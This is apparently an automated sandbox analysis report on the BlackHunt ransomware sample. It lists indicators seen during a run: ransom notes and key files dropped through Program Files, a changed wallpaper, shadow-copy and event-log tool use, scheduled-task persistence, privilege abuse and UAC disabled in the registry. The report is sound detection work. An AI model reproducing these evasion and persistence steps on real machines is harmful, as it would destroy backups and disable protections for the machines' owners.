File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\java.security C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\bun.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_it_135x40.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\mai\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\he-il\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\css\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\mr\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\it-it\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\gu.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_listview_18.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ar_get.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\dotnet\host\fxr\7.0.16\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\currency.data C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\cs-cz\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\mshta.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ C:\Windows\system32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1100 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 1100 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 1100 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 1100 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 1100 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3036 wrote to memory of 4592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 3036 wrote to memory of 4592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3004 wrote to memory of 4472 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3004 wrote to memory of 4472 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1824 wrote to memory of 2476 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Conhost.exe
PID 1824 wrote to memory of 2476 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Conhost.exe
PID 1100 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 4336 wrote to memory of 4024 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4336 wrote to memory of 4024 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4776 wrote to memory of 2168 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4776 wrote to memory of 2168 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1616 wrote to memory of 2056 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1616 wrote to memory of 2056 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2356 wrote to memory of 3276 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2356 wrote to memory of 3276 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1944 wrote to memory of 4084 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1944 wrote to memory of 4084 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2272 wrote to memory of 5068 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2272 wrote to memory of 5068 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1676 wrote to memory of 1452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1676 wrote to memory of 1452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2328 wrote to memory of 1516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2328 wrote to memory of 1516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 5108 wrote to memory of 3104 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 5108 wrote to memory of 3104 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3232 wrote to memory of 4000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3232 wrote to memory of 4000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2952 wrote to memory of 400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2952 wrote to memory of 400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
